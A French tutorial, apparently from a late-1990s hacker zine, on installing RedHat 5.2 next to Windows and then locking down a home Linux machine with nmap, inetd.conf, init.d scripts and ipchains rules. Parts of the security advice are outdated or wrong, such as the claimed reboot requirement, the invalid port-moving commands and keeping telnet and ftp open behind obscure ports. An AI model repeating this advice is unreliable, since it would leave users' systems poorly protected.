Réalité si l'on a pas un minimum de méthode et que l'on ne suit pas toutes les marches à suivre dans l'ordre. Ecoutez aussi mes conseils, ils sont importants. Je vous conseil tout d'abord d'imprimer cette page car vous ne pourrez pas l'avoir sous les yeux lors de l'installation sinon et ne présumez pas de votre mémoire vous ne pourrez tout retenir si vous n'avez pas déjà installé Linux une fois. Je vous expliquer ici comment expliquer la RedHat 5.2. La Redhat est surement la plus utilisée car la plus commerciale, celle bénéficiant du plus de pub (de la pub? où ça?) et si je parle de la 5.2 c'est parce que c'est la dernière (euh la 6.0 vient de sortir mais bon la 5.2 est suffisante et j'imagine qu'il ne doit pas y avoir tant de différences et en plus dans les books vous ne trouverez pas la 6.0 car venant de sortir elle ne bénificie pas de prix avantageux).

Au départ soit vous avez une disquette de boot soit vous n'en avez pas. La disquette de boot de linux est comme une disquette de boot de windows sauf quelle ne mène pas au dos comme celle de win mais à un menu qui permet la maintenance du système ou sont installation ou encore sa mise à jour. Si vous n'en avez pas il va falloir la créer. Pour cela rien de plus simple, prenez une disquette, formattez la et laissez la dans le lecteur (on va prendre dans l'exemple que le lecteur de disquette a la partition a:, que la partition où est installée Windows est c: et que le lecteur de Cd a la partition d: . Si ce n'est pas le cas, procédez aux modifications sur la commande et et pas sur vos partitions). Vous allez chercher le programme rawrite.exe sur le cd (généralement il se trouve dans /dosutils mais ça peut dépendre des éditions) et le copier dans la racine de votre disque dur, puis l'executerez.
Puis vous allez taper rawrite -f d:\images\boot.img -d a: -n. Voila vous avez votre disquette de boot RedHat 5.2.

Maintenant on va préparer la place pour Linux sous Windows ce qui vous évitera beaucoup de désagréments. Bon bien sur vous pourriez le faire directement à l'installation de Linux via Fdisk ou DiskDruid mais vous risqueriez de perdre des données et la je parle d'expérience alors faites moi confiance la manière que je vais vous donner est de loin la plus safe même si elle vous prendra deux minutes de plus. Sous Windows vous allez partitionner votre disque avec un moins deux partitions. Si vous en aviez plus que deux avant vous allez utiliser l'une d'elle si sa taille est approximativement de 800Mo (c'est ce qu'il vous faudra pour installer Linux avec WindowX et être confortable dessus). S'il y avait quelque chose sur cette partition, déplacez les vers une autre partition car la partition que vous choisirez pour être celle de Linux devra être formatée obligatoirement lors de l'installation de Linux. Ici nous allons prendre l'exemple suivant, vous avez un disque dur de 4,3 Go partitionné en 2 partitions identiques de plus de 2 Go chacune. Les deux partitions sont respectivement nommées c: et d:. La partition c: est celle où est installé Windows et la partition d: est celle où nous choisirons d'installer Linux. Tout e qui se trouvait sur la partition d: devra être déplacé vers la partition c: à moins que vous ne préfériez repartitionner d: en partition d: et e: mais avec fdisk c'est très simple. Ne craignez rien si vous avez assigné un partition de 2 Go à Linux et que vous ne voulez pas lui en donner tant (ça se comprends car au départ vous préférerez laisser le plus de place à Windows vu que vous ne réalisez sûrement pas encore que Linux est un OS à part entière et que vous pourriez l'utiliser comme vous utilisiez Windows avant) vous pourrez lors de l'installation de Linux repartitionner la partition Linux de 2 Go en une Linux de 1Go et une Windows d: de 1Go. Je vous expliquerais comment faire ne craignez rien. Maintenant que vous avez assigné (au moins dans votre tête) une partition ne contenant plus de données essentielles pour vous (et oui car on va la formater cette partition) nous allons passer à l'installation de Linux proprement dite.

Allez on reboot avec la disquette toujours dans le lecteur. Là ce n'est pas Windows qui va se lancer mais une page colorées (pas de dessins, juste des lettres) qui va vous proposer différentes possibilités. Vous vous voulez faire un installation donc vous allez appuyer sur enter et après on va vous demander en quelle langue vous désirez que l'installation se fasse. Si vous tappez fr et appuyez sur enter après ça vous évitera d'avoir à choisir la langue. Si pendant que cela charge il y a marqué "boot failed", appyez sur enter apprès avoir enlevé la disquette puis réappuyer sur enter pour repasser sous Windows. Une fois là, recréez une disquette de boot comme expliqué précédement.

Alors avant de vous demander le repartitionnement du disque on va vous poser certaines questions. Pour la langue (si vous n'avez pas tapé fr enter au début) vous mettrez français, pour le clavier vous mettrez fr-latin1 et pour l'interface scsi vous allez mettre non même si vous en avez une ça vous évitera les embarras car là on vous la demende si elle vous est nécéssaire pour l'installation. Si ce n'est pas le cas elle sera automatiquement détectée dès la fin de l'installation. Ensuite on va vous demander la méthode d'installation (nfs, cdrom...) et vous mettrez cd rom puis placerez le cd de Linux dans le lecteur et appuyez sur enter. Ensuite vous mettrez "installation" et non pas "mise à jour" à moins que vous ayez déjà installé une anciène version de RedHat mais je ne pense pas que ce soit le cas pour vous. Ensuite on va vous demander quel type d'installation vouv désirez et la vous allez mettre "personnalisée" ca vous permettra de bien choisir "votre" installation en fonction de votre matériel et de vos besoins.

Là on va vous demandez si vous préférez utiliser Fdisk ou DiskDruid. Moi personnellement je préfére de loin DiskDruid mais bon comme les deux sont proposés et que cela pourra toujours vous servir de savoir comment il marche je vais détailleur les deux types d'installation:

-DiskDruid:

Pour vous déplacer dans la fenêtre DiskDruit vous utiliserez les flèches et la tabulation (pour vous déplacer également), la barre espace (pour cocher) et enter (et oui). Alors la dans l'exemple vous avez deux partitions dos (l'une c: et l'autre d:) qui s'appeleront respectivement hda1 et hda2 (hda c'est les déterminations des disques sous UNIX). Vous ne toucherez surtout pas à hda1 sous peine de perdre toutes vos données sur votre partition Windows ou de créer des problèmes que vous ne saurez pas résoudre à votre niveau. Donc à la place de la partition hda2 vous allez créer une partition hda2 linux native (c'est la parttion de linux ou sera installé le système d'exploitation et toutes vos données Linux) et une parttion hda3 Linux Swap (c'est une parttion jouant le rôle de mémoire ram pour le cas où votre mémoire ram ne serait pas assez grande. Cela évite à l'OS de faire un choix sur les données à garder comme le fait le dos). Je vous conseille de faire une seule partition native (j'ai pas encore trop vu le but d'en faire plusieur sauf si votre Linux doit être transformé en serveur ou être réellement orienté multiutilisateur et où la sécurité doit être vraiment privilègiée (pour moi le seul but de faire plusieurs partitions natives et de vouloir pouvoir formater d'un coup sans se prendre la tête toutes les données utilisateurs ou de facilité la mise en place olus rapide de sécrités concrètes au niveau user). Bef si vous voulez utiliser Linux pour le hack ou pour la "même" utilisation que windows et que vous n'avez pas l'intention de vous en servir comme serveur d'entreprise une seul partition Linux native suffira. Je vous conseille de prendre de 800 Mo à 1Go de mémoire pour Linux coupés en deux partitions (native et swap) et de ne donner que grand maximum 50 Mo de mémoire swap à Linux.
On vous demandera un point de montage pour la native et vous mettrez /. Si vous ne mettez rien l'installation ne pourra se faire. Le / signifie que vous voulez que tout Linux soit installé à la racine. C'est à dire que si vous faites cd / (instruction faisant revenir à la racine) vous trouverez en faisant ls (équivalent de dir sous dos) les repertoires /etc /usr /boot /home /mnt /dev ... La partition swap n'a pas de point de montage car j'imagine que ça ne vous interressera pas de savoir que tel ou tel programme utilise cette variable et est utilisée suffisement fréquement pour y figurer. De Linux pour pouvoir accèder à Windows il existe un programme qui s'appelle Samba et que l'on peut installer sur Linux dès la première installation (on vera cela plus tard) mais il y a un autre moyen de pouvoir accèder aux données de Windows c'est de mettre un point de montage à vos partitions dos. Par exemple de mettre le point demontage /dosc à votre partition c:. Ce qui fera que dès que vous aurez installé Linux et que vous vous mettrez en mode console, si vous faites cd / puis ls vous apercevrez un repertoire nommé /dosc dans lequel vous trouverez les même choses que si vous faites dir sous c:.
Une fois que vous avez fait tout ca il vous restera probablement de la place surtout que dans l'exemple on était parti d'une partition de 2 Go donc il voues reste 1,2 Go (2 Go - 800 Mo = 1,2 Go) donc nous allons créer un autre partition dos pour vous redonner de la place sous windows et ainsi recreer la parttion d: que l'on avait effacé pour créer la partition Linux native et qui se retrouvera ainsi emputée de 800 Mo. Celle la vous ne l'appelerez pas native ni swap mais avec le nom que celle qui contient Windows c'est à dire hda1 normallement. Je vous dis de l'appeler "de la même manière" et ne vous dit pas comment elle s'appelle car cela dépendra de si votre système est le 95 le 98 et si c'est un fat 16 ou 32 ais je pense que vous serez amené à mettre "DOS 16-bit>=32M" comme type de partition. Donc ne vous prenez pas la tête appelez la de la même manière mais surtout pas native ni swap. Comme cette partition est maintenant la partition d: vous pouvez lui mettre un point de montage pour pouvoir y accèder aussi sous Linux. Si vous avez mis /dosc pour c:, mettez /dosd en point de montage pour d: à moins que vous vouliez mettre autre chose, le choix est bien entendu libre.
Pour toutes les partitions crées vous pouvez les rendre extensibles en cochant la case prévue à cet effet en appuyant sur espace. Une fois toutes les partitions crées, leur point de montages déterminé, leur taille et leur extensibilité définie et que plus aucune place n'est disponible vous allez pouvoir cliquer sur ok et si vous avez suivit à la lettre ce que je viens de vous expliquer vous ne devriez pas de rencontrer le moindre problème. Passez le paragraphe parlant deFdisk et rendez vous directement à la suite de l'installation.

-Fdisk:

Moi je n'aime pas Fdisk et je trouve ça moins clair que DiskDruid mais comme ça peut servir je vous l'explique quand même.

-Suite de l'installation:

Une fois le parttionnement terminé on vous demendera quels packetages vous desirez installer. La faites ce que vous voulez et si par la suite vous trouver que certains ne vous servent pas ou qu'il vous en manque et bien vous pourrez toujours les installer sans avoir à reinstaller Linux (hereusement). Ensuite on va vous demander votre type de sourie, de modem, d'imprimante, la définition et le rafraichissement de votre moniteur ainsi que votre carte graphique et sa mémoire vidéo. Pour cela ce n'est pas très dur et je vous laisserez vous demerder. Le seul truc qui pourrait vous poser des problèmes c'est pour le ttpe de moniteur si vous choisissez de ne pas en prendre un de la liste. Là si vous ne savez pas quoi chocher, allez y au feeling et notez bien le choix que vous avez pris et si ça ne donne rien de satisfaisant reconnencez avec une autre configuration (d'où l'interêt de noter celles que vous avez déjà essayé et qui n'ont rien donné de bon).

On va ensuite vous demander le password du root et la ce n'est pas du hacking, quelque soit le pass que vous mettrez il sera bon ;-). Quand vous l'écrirez il n'apparaîtra pas et c'est normal ne vous inquiétez donc pas. Une fois celui ci entré appuyez sur tabulation et réecrivez le une deuxième fois et appyez sur enter. N'oubliez pas de retenir ce password car c'est votre password root. Ensuite il va falloir paramètrer LILO (c'est le programme qui va se lancer au boot et qui vous permettra de choisir à chaque démarrage si vous voulez lancer Windows ou Linux. De base LILO privilégiera Linux (on se demande pourquoi) c'est à dire que si au bout de 50 secondes vous n'avez pas fait votre choix au démérrage du pc c'est Linux qui va se démarrer par défaut. Bien sûr vous pouvez changer ça en appuyant sur F2. Maintenant validez en appuyant sur enter.

Voila maintenant l'installation est terminée est votre pc va rebooter. N'oubliez pas de retirez le cd et la disquette des lecteurs avant de rebooter sinon vous aurez le droit à une nouvelle installation. Je sais que c'est simpa mais bon faudrait pas trop abuser des bonnes choses. La LILO va se mettre en marche, appyez sur tabulation si vous voulez voir ce qu'il faut taper pour accèder à Windows ou Linux (ça c'était paramètrable tout à l'heure si vous n'aviez pas vu). Si au prompt LILO vous appyez sur enter, c'est l'OS que vous avez choisi pour LILO par defaut qui va se lancer. Et si vous n'avez rien tappé, au bout de 50 secondes ce sera l'OS par défaut qui se lancera.

Bien sûr ici vous allez lancer Linux histoire de voir ce que donne ce nouvel environnement graphique. Beaucoup de choses vont se marquer sur l'écran et il est plus que probable que vous n'en compreniez pas un dixième mais ce n'est pas important. Puis l'écran va s'effacer et on vous demander un login (localhost login). Pour l'instant le seul login existant est celui de root (mais on en rajoutera par la suite) donc vous allez écrire root et appuyer sur enter. Puis on vous demandera le password correspondant et vous allez écrire celui que vous avez mis tout à l'heure. Il ne s'affichera pas mais ne paniquez pas c'est normal c'est pour éviter que si quelqu'un se trouve derrière vous il puisse le voir (et oui Linux équipe aussi les entreprises). Là le pass et le login seront accètés. Si ce n'est pas le cas il y aura marqué "login incorrect" mais ce n'est ppas que le login est faut cela peut tres bien venir du password et si le login que vous avez entré est "root" c'est sûr que vous ne vous êtes trompé que de login. Ce n'est pas grave, retappez le juste. Ensuite vous allez voir le prompt suivant qui va s'afficher juste apres l'heure et la date: [root@localhost/root]#

Cela signifie que vous êtes sous le login root devant votre pc et que vous y êtes en statut de root et que votre bécane a pour nom "localhost" mais n'ayez crainte ca se change plus tard en tapent "linuxconf" dans la console. On a déjà vu que le fait d'être logué sous le login root ne vulait pas dire que vous étiez root sur la bécane, tout dépends des droits attribués au login "root".

Ensuite vous allez essayé des commandes de base tel que "ls" ou "cd etc" ou "cd .." ou encore "date". Une fois que vous avez bien vu que cela marchait sous le même principe que le dos vous allez faire "exit". Voila on est revenu au point de départ et vous voyez qu'il faut recommencer à entrer le login et le pass. Une fois revenu au prompt # (qui indique que vous êtes root sinon si vous n'êtiez que user et quelques soient les droits de cet user vous auriez un $ à la place.) vous allez taper "startx" et cela lancera W-Windows (interface ressemblant à Windows) et vous allez voir que vous ne serez pas totalement dépaysés sur ce nouvel OS.

Alors là je vous laisse un peu farfouiller partout, sachez juste que contrairement à Windows, Linux permet de changer d'interface grafique si celle ci ne vous convient pas en faisant "switch to". La RedHat propose trois versions dont la "afterstep" dont je trouve la mieux faite au niveau graphique (100 fois mieux que Windows) mais qui et chiante niveau fonction. Enfin quand vous commencerez à maîtriser vous ne vous en servirez même plus car vous serez tout le temps en mode console (cependant plus agréable, plus rapide et comportant plus de fonctions que le DOS) et mais c'est vrai que cela pourra vous embetter au départ alors allez télécharger KDE qui est la meilleur interface graphique (je suis loin d'être le seul à le dire) sous Linux à l'adresse suivante: ftp://ftp.lip6.fr/pub/linux/distributions/redhat-contrib/libc6/SRPMS et téléchargez kdebase, kdelibs et kdesupport.

C'est un packetage RPM comme vous avez pu le voir avec l'extension dont l'installation se fait toujours de la même manière:
          rpm option nom_du_paquetage
Donc ici on va faire:
          rpm -i kdebase-1.1-1rh5x.src.rpm
          rpm -i kdelibs-1.1-1rh5x.src.rpm
          rpm -i kdesupport-1.1-1rh5x.src.rpm
Pour plus d'infos sur rpm et sur ses options lisez un book sur Linux.

Pour arrêter Linux faites exit si vous êtes sous X-Window puis une fois en mode console faites exit puis Alt-Ctrl-Suppr ou faites shutdown ou encore halt ou reboot.

Derniere chose la liste des materiels non compatibles se trouve dans la majorité des livres parlant de Linux (livre ça veut dire au moins 600 pages) alors si vous les avez vous risquez d'avoir des problèmes avec ou qu'ils ne soient tout simplement pas détectés. Alors vous avez deux possibilités, soit vous en changez ou soit vous allez voir s'il y a eu des mises à jour du noyau ou des drivers sur les sites du constructeur du périférique qui pose problème ou sur celui du constructeur de la version de Linux (ici RedHat: www.redhat.com).

Voila c'est fini, bonne route dans ce nouvel univers.
 

Sécuriser son Linux :

Linux est assez fondammentalement différent de Windoxs et si vous l'avez installé vous avez du vous en rendre compte à la première utilisation. Sous Windows vous vous munissez d'un bouffetroyen, patchez le port 139 pour éviter le nuke et le tour est joué. Si vous avez installé des serveur http u ftp tel servU ou autre vous devrez vous juste les paramètrer ou installer un Firewall mais tout ceci est très simple et très transparent vu les rares ports ouverts sur windows 9X à la base. Pour ce qui est de Windows NT (déjà beaucoup plus orienté réseau même pour le NT workstation) vous devrez vous pencher plus sur les probème de sécurité mais ce sera pour un autre article car ici c'est de Linux dont on va parler.

Je vais partir du fait que vous êtes un utilisateur de base et que vous n'avez pas besoin de lunix pour le travail  ou pour placer quoi que ce soit en réseaux ou besoin d'un système multi utilisateur autre que pour vous même. En partant de se principe il va falloir fermer le plus de ports possibles et éviter d'installer les applications connues pour être buggées ou sources de de trou de sécurité si elles sont mals paramètrée. Moi je vous conseillerais de les installer pour mieux comprendre comment elles fonctionnent mais en therme de sécurité c'est une mauvaise idée. En effet installer NIS, NFS et Samba (en réseau seulement) est une mauvaise idée au point de vue de la sécuritée.

Bien sûr au moment de l'installation on va vous demander ce que vous voulez comme installation et vous ne savez pas les programmes contenus dans chacun de ces choix et moi non plus rassurez vous juste approximativement et beaucoup trop approximaivement pour que cela soit d'une quelconque utilité par la suite. Par contre si l'on vous demande explicitement si vous voulez installer NFS et NIS dites non haut et fort. Maintenant vous vous retrouvez devant un Linux qui a énormément de secrets pour vous et vous ne savez sûrement pas comment le sécuriser parfaitement. Je pars du fait que vous avez une connection internet par Linux sinon ce n'est pas la peine de continuer de lire cet article.

Au départ vous n'avez qu'un compte root alors vous allez creer un compte simple user, pour cela loguez vous en root et faite:
adduser RhylKim (je donne RhylKim parce que c'est moi mais vous vous le changerez par ce que vous voudrez)
puis vous créez un password pour ce compte en faisant:
passwd RhylKim
La on vous demandera de tapper le password deux fois pour être bien sûr que vous ne vous êtes pas trompé et vous allez mettre le mot de pass le plus dur ue vous trouviez et que vous soyez sûr de vous rappeler. Evitez donc un mot d'un dictionnaire ou votre nom de famille ou pire, le même mot que le login. Evitez aussi les mot de pass bateau tel que test, admin, user, games, passwd, password, login... De plus il est préférable que le password soit composé de lettres majuscule, minuscule, de chiffres et de caractères ASCII pour donner beaucoup plus de peine au cracker de brute force au cas où quelqu'un réussirait à trouver un de vos login ou pire à mettre la main sur votre fichier passwd. L'interêt de créer un account user est de ne se connecter à internet ou à un quelconque autre réseau que sur cet account. Si vous aviez des modifications à faire que seul le root peut faire il serait toujours temps de faire un "su root" puis d'entrer le password du root pour revenir au statut de root. Ces précautions permettent que si un Hacker trouve une faille sur votre système il n'arrive qu'à se connecter qu'en tant que simple et non en temps que root directement.

Ceci étant fait on va maintenant se connecter à internet pour chopper un scanner digne de ce nom: nmap.
Vous le trouverez sur unsecure (www.unsecure.org), très bon site pleins d'explois soit dit en passant mais nous y reviendrons dans cet article. Vous téléchargez donc nmap au formap rpm si vous avez une redhat ou au format tgz si vous avez une autre distribution.
Sous redhat faite: rpm -i nmap.rpm (le fichier ne s'appellera pas nmap.rpm mais c'est juste pour illuster)
Sous une autre distribution de linux faites: tar -zxvf nmap.tgz (cela le decompressera) puis installez le.
Il se peut après que le programme nmap se trouve dans /usr/local/bin. si c'set le cas mettez le dans /bin ou /sbin ce qui creera une commande nmap cela vous evitera d'aller dans /usr/local/bin et de taper ./nmap.. à chaque fois puisque vous n'aurez plus qu'à taper nmap... où que vous soyez.

Une fois qu'il est installé vous allez le lancer sur votre ip. Il n'est bien sûr pas nécéssaire d'être connecté pour voir quels ports sont ouvert sur votres bécanne, un simple nmap -O 127.0.0.1 scannera vos ports. Vous devriez savoir dans les secondes qui suivent quels sont vos ports ouvert et si c'est votre première installation de linux vous risquez d'en avoir un paquet d'ouvert. Alors on va comencer par le commencement: le démon inetd. Ce démon à été crée pour faciliter la tache des administarteurs système car il permet assez simplement d'ouvrir ou de fermer pas mal de port dont pas mal que vous connaissez tel (telnet, ftp, tftp, finger...). Le seul point négatif que je pourrais octroyer à ce démon c'est que chaque modification que vous y apportez demande un reboot pour être éffective. C'est sûrement un sécurité pour éviter qu'on ouvre un telnet si on a déjà un acces ftp sur un bécane pour nous éviter de se procurer un shell (n'est ce pas Gazzzton ;-). Bref c'est chiant main on fera avec. Le fichier où l'on peut ouvrir et fermer les ports sous la tutelle du démon inetd se trouve dans /etc et s'appelle inetd.conf. Vous l'éditez par exemple en faisant un "vi inetd.conf" (sacré vi tu m'en aura fait baver avec tes commandes illogiques au possible).

Apparté sur les commandes vi:
dd supprime une ligne avec tout ce qu'il y a marqué dessus
x supprime un caractère
i insère un caractère
escape  permet de sortir d'un mode comme le mode insersion par exemple
:q permet de quitter sans sauvegarder
:wq permet de quitter en sauvegardant
Fin de l'apparté.

Bon amintenant vous allez voir un certain nombre de lignes. Chaque ligne correspond à un port. S'il y a un # devant la ligne cela veut dire que le port est fermé. et si vous l'enlever vous ouvrez le port comme quoi cela pouvait difficilement être plus simple d'utilisation (une fois n'est pas coutume ;-). Vous fermez donc tous les ports hormis le auth qui sert dans dans irc par exemple et dans d'autres applications que je ne connais pas enfin bref vous ne le fermez pas. Moi je préfère avoir le telnet et le ftp ouvert sur ma bécane car cela sert toujours mais vous pourrez penser ca absurde vu tout ce que vous avez du entendre sur eux. Moi je vous conseil cependant de les laisser ouvert car si vous en avez besoin n'oubliez pas que vous serez obligé de rebooter. Je vous expliquerais plus tard comment les protéger et/ou les cammoufler :-). Maintenant que vous avez édité inetd.conf et que vous l'avez modifié et enregistré vous allez voir si les modifications que vous avez faites en rebootant puis en lancant nmap. Une fois ceci fait si vous avez encore des ports comme le finger ouvert c'est que vous n'avez pas enregistré correctement mais cela ne devrait pas se passer.

Maintenant on va s'attaquer aux autres ports, ceux qui ne sont pas controlé par le démon inetd et qui malgré tout sont ouvert chez vous et ne vous faites pas d'illusions, ce sera le cas. Pour les fermer c'est très simple en fait mais le probème est qu'ils se réouvriront à chaque reboot ce qui est quand même génant. Les programmes qui ouvrent ces ports sont lancé au démarrage de Linux il va donc falloir aller dans le dossier où se trouvent une grande partie des programmes qui se lancent au demmarrage et qui utilisent des ports. Ce dossier c'est /etc/rc.d/init.d et dednas ce trouvent souvent une douzaine de programme mais cela varie bien sûr en fonction des applications que vous avez choisi delancer au démarrage. Pour que ces programes ne se lancent pas au démarrage il vous suffira de déplacer ces programmes mais ne les supprimez pas ils peuvent toujours servir. Par exemple le porgramme /etc/rc.d/init.d/sendmail lance le demon sendmail (pour le courrier) et souvent c'est une grande faille dans un système il y a tellement d'exploits sur les démons sendmail qu'il vaut mieux les désactiver surtout qu'ils ne vous serviront pas à grand chose.
Comme on ne va pas le supprimer on va par exemple le mettre dans un dossier que l'on va appeler demarrage dans /root. Pour cela il va faloir vous loguer en root si ce n'est déjà fait puis faite:
cd /../root/
mkdir demarrage
cd /
mv /etc/rc.d/init.D/sendmail /root/demarrage
et voilà le démon sendmail ne se lancera pas au prochain reboot mais il est pour l'instant encore actif. pour le desactiver soit vous rebootez soit vous allez dans le dossier où vous venez de le mettre et vous faites "./sendmail stop" ou "killall sendmail" au choix. Et c'est à peu près pareil pour tous les programmes présents dans init.d cependant il y a quelques programmes présents dans ce dossier qu'il ne faut pas arrêter saous peinde problèmes, jamais grave, mais qui entraineront un reboot.
C'est le cas de gpm par exemple qui désactive la sourie. essayez "./gpm stop" et vous allez rigoler.
Je vous détaille tout dans le tableau ci dessous:

Les programmes à fermer :
 
Nom des programmes Ports fermés Numéro des ports : Manière de les fermer Manière de les rouvrir
named domain 53 ./named stop ./named start
lpd printer ./lpd stop ./lpd start
innd nntp ./innd stop ./innd start
smb netbios-ssn 139 ./smb stop ./smb start
ypbind nis ./ypbind stop ./ypbind start
nfs nfs 604,1002,1023,1024 ./nfs stop ./nfs start
crond fhc ./crond stop ./crond start
xfs msl_lmd ./xfs stop ./xfs start
snmpd subfiledbg ./snmpd stop ./snmpd start
portmap rpc 111 killall portmap ./portmap start
sendmail sendmail 25 killall sendmail ./sendmail start
httpd http 80 ./httpd stop ./httpd start
Les programmes à ne surtout pas fermer ou lancer :
 
Noms des programmes Conséquences : Manière d'y remedier
mars-nwe Cela ouvre le port bgpd (....) reboot
single Cela fait clignoter votre écran, vous ne pouvez plus rien faire  reboot
gpm Vous ne pouvez plus bouger votre sourie (vive le mode texte ;-) reboot
network Cela désactive les IPv4 ce qui a pour effet de ralentir le flaux de données ./network start
routed Active RIR et ouvre le port nms (1429) reboot
atd Ouvre le port dec-notes (3333) reboot
killall Déscative tous les programmes de init.d avec toutes les conséquences liées  reboot
Je dis qu'ils sont à ne surtout pas fermer, c'est vrai pour certain que vous aurez reconnu d'après les conséquences mais si vous fermez ou lancez des programmes commes atd ou routed ce n'est pas grave mais au point de vue sécurité ce n'est pas top sachant que moins vous avez de ports ouverts moins vous risquez quelque chose. mais rien ne vous empèche d'essayer pour voir. Comment croyez vous que j'ai découvert tout ça?

Il y a cependants des programmes comme nfs qui s'ils sont de base lancés au démarrage et même une fois enlevé de init.d ouvrent tout de même un port vous pourrez d'ailleur vérifier ça avec nmap. Et oui le port 1024 (nfs) restera ouvert et donc vous devrez le fermer en allant dans le dossier que vous avez crée dans /root et faire ./nfs stop et là vous verez que sur les 5 ports que contrôle nfs, 4 ne se fermeront pas (et oui puisqu'ils sont déjà fermé) et que le dernier lui se fermera. Il y a un moyen de la fermer directement au demarrage si vous connaissez la programmation de scipts UNIX mais cal donnera lieu à un autre article.

Maintenant on va passer aux quelques ports restant. C'ertains d'entre aux ne seront pas à fermer comme le X11 par exemple. En effet ce port est utile si vous avez Xwindow. Le fermer pourra entrainer des erreurs alors laissez le ouvert ou passez en mode texte :-)

Maintenant s'il vous reste des ports ouvert dont je n'ai pas parlé c'est parce que je n'ai pas ce problème sur ma bécane mais si c'était le cas comme avec les port iad, iad2 et iad3 par exemple et bien on va faire appel au Firewall. On ne sait pas à quoi ces ports servent, on ne sait pas quelles applications les utilisent, personne n'est capable de vous renseigner et dans les bouquins et sur internet ce n'est pas marqué alors on va juste les bloquer en entrée pour éviter les intrusion mais surtout pas en sortie pour éviter les problèmes dus à ca filtrage. Il y a plusieurs manières de paramètrer un FW. Il y a la méthode qui consisite à en acheter un dans le commerce ou à le trouver sur internet et de préférence gratuit mais si vous n'êtes pas sûr de la source cela peut être en faite une backdoor ce qui serait dommage. Deuxièmes solution, compiler le noyau en activant les options de filtrage. Ca c'est expliqué clairement dans le frhack 1 si je me souviens bien alors comme je n'ai pas envie de revenir dessus je vous renvois la bas. la dernière solution est de paramètrer un firewall en ajoutant une ligne de commande au fichier rc.local qui se trouve dans /etc/rc.d. En fait plus qu'une ligne on en mettra une par port à fermer et cette ligne se compose de la manière suivante:
ipchains -A input -p tcp -j DENY --destination-port numéro_du_port -i nom_de_la_connection
Pour que vous compreniez mieux cette ligne je vais faire un exemple. Par exemple si vous voulez fermer le port 1024 (nfs) qui nous embarrassait tout à l'heure car il restait ouvert même après l'enlèvement du fichier nfs de /init.d vous allez écire dans rc.local:
ipchains -A input -p tcp -j DENY --destination-port 1024 -i ppp0
Ici votre connection s'appelle ppp0 mais si celle que vous avez paramètré s'appelle ppp1 ou autre ou que vous êtes sur un réseau local vous écrirez le nom de votre connection. Logiquement vous devriez la connaître car vous l'avez crée quand vous avez créer une connection à internet ou autre. Si vous ne vous en souvenez plus ou que ce n'est pas vous qui l'avez paramètré vous allez taper ifconfig en mode console. Vous verrez des caractères s'afficher en deus parties. Au début de chaque partie vous verez le nom de la connection. Dans la première partir le nom de la connection internet et dans la deuxième le nom de cla connection intranet. Vooyez sur quoi vous voulez placer le filtrage et inscrivez le bon nom deconnection en conséquance.
Bien sûr si le port que vous voulez filtrer n'utilise pas le protocole tcp mais udp ou .............. vous rempalcerez tcp dans la ligne ipchains par le protocole que le port utilise.
Cette ligne doit se trouver complétement en bas du chichier rc.local, juste après le dernier fi. Une fois ceci fait vous sauvegardez et vous rebootez. Pour vérifier si vos port sont bien filtré vous ne pourrez pas le faire vous même avec nmap car il faut que vos ports soient scannés de l'extérieur vu que le filtrage se fait de l'extérieur vers l'intérieur. Demandez donc à un de vos potes qui a linux de la faire (merci de ne pas me le demander à moi ;-) mais de toute façcon même si vous ne vous ne pouvez pas le tester ne vous inquiétez pas il n'y a aucune raison que cela ne marche pas.

Une fois que tous les ports indésirable sont filtrés nous allons passez au camouflage du telnet et du ftp. En effet le filtrage que je vous ai expliqué plus tôt est un filtrage complet qui refuse sytématiquement tout envoit de paquet de l'extérieur donc si vous filtrez telnet et ftp de cette manière autant les fermer directement avec le démon inetd. Donc il ne faut pas filtrer telnet et ftp du manière aussi définitve et comme vous ne saurez pas quel pote vous aurez envie de faire entrer dans votre bécane un jour et donc vous ne connaîtrez pas non plus son provider nous n'allons pas utiliser des filtrage moins puissant qui n'autorise que certaines ip car cela ne servirait à rien. Alors comment cammoufler ces ports? Parce que vous êtes bien d'accord que si vous scannez un serveur vous ne vous interesserez pas aux ports que vous ne connaissez pas et qui se perdent entre les 30000 et 60000 mais plutôt aux ports dits privilégiés (ports<1024) alors nous allons tout simplement changer les lignes ftp et telnet du fichier inetd.conf de manière à reporter ces ports (initiallement 21 et 23) en 52000 et 52001 vu que ces ports ne sont presque jamais utilisés et qu'aucun conflit ne pourra alors survenir.

- Donc pour mettre le port ftp sur le port 52000 vous allez vous mettre en mode console et vous allez faire:
          in.ftpd localhost:52000
          (localhost est le nom de votre bécane et est donc à remplacer par assassin si votre bécane s'appelle assassin)
- Et pour mettre le port telnet sur le port 52001 vous allez écire ceci toujours en mode console:
          in.telnetd localhost:52001

Vous pouvez bien entendu faire ceci avec la majorité des ports régit par inetd et voici la ligne de commande à taper pour quelques un des ports les plus souvent utilisés dans Linux.

Et comme vous avez lu et compris ce que j'ai marqué au dessus vous devez vous douter que pour activer les changement et surtout parce qu'ils ont été fait dans inetd.conf il va falloir rebooter. Une fois ceci fait vous allez vérifier si les changement ont bien été enregistré en essayant nmap sur vous et là vous n'aurez pas les mêmes probèmes que pour le firewal. Vous pourrez donc bien vérifier par vous même les changements apportés.

Maintenant imaginons que vous ayez à faire à un hacker qui n'ai pas un très bon scanner de ports ou qui se fie pour savoir quelle version d'un démon gère un port à la banniere qui apparait à la connection, nous allons pouvoir le mettre sur une fausse route en changeant cette banniere. Je m'explique. Quand vous vous connectez au ftp d'un server ou à un telnet ou à l'inporte quel port ayant un service tournant dessus demandant un login, vous voyez souvent s'afficher le nom et la version du programme qui permet l'acces ou encore le nom de l'entreprise ou bien encore le mail de l'administrateur système ou un message de bienvenu. C'est ça la bannière. N'utilisant pas d'habitude de scanner qui donne la version du ftp ou du telnet (...) je me fies bien souvent à la banniere et une très grande majorité des hackers font comme moi donc modifier celle-ci sera source de gène aux eventuels assaillants d'où l'interet de la changer. Et ce pour chaque port ouvert demandant un login. Ceci pourra empècher des exploits ou des buffer overflow de fonctionner car ils auront été choici en fonction de la version et donc du code source du programme.

Pour changer une bannière je vous montre comment faire:

Pour Telnet:
Vous allez changer le contenu des fichiers issue et issue.net contenus dans /etc avec vi. Ce que vous marquerez dans ces fchiers s'affichera quand vous ou tout autre personne extérieur ou non à votre bécane lancera un telnet sur celle ci.

Pour FTP:
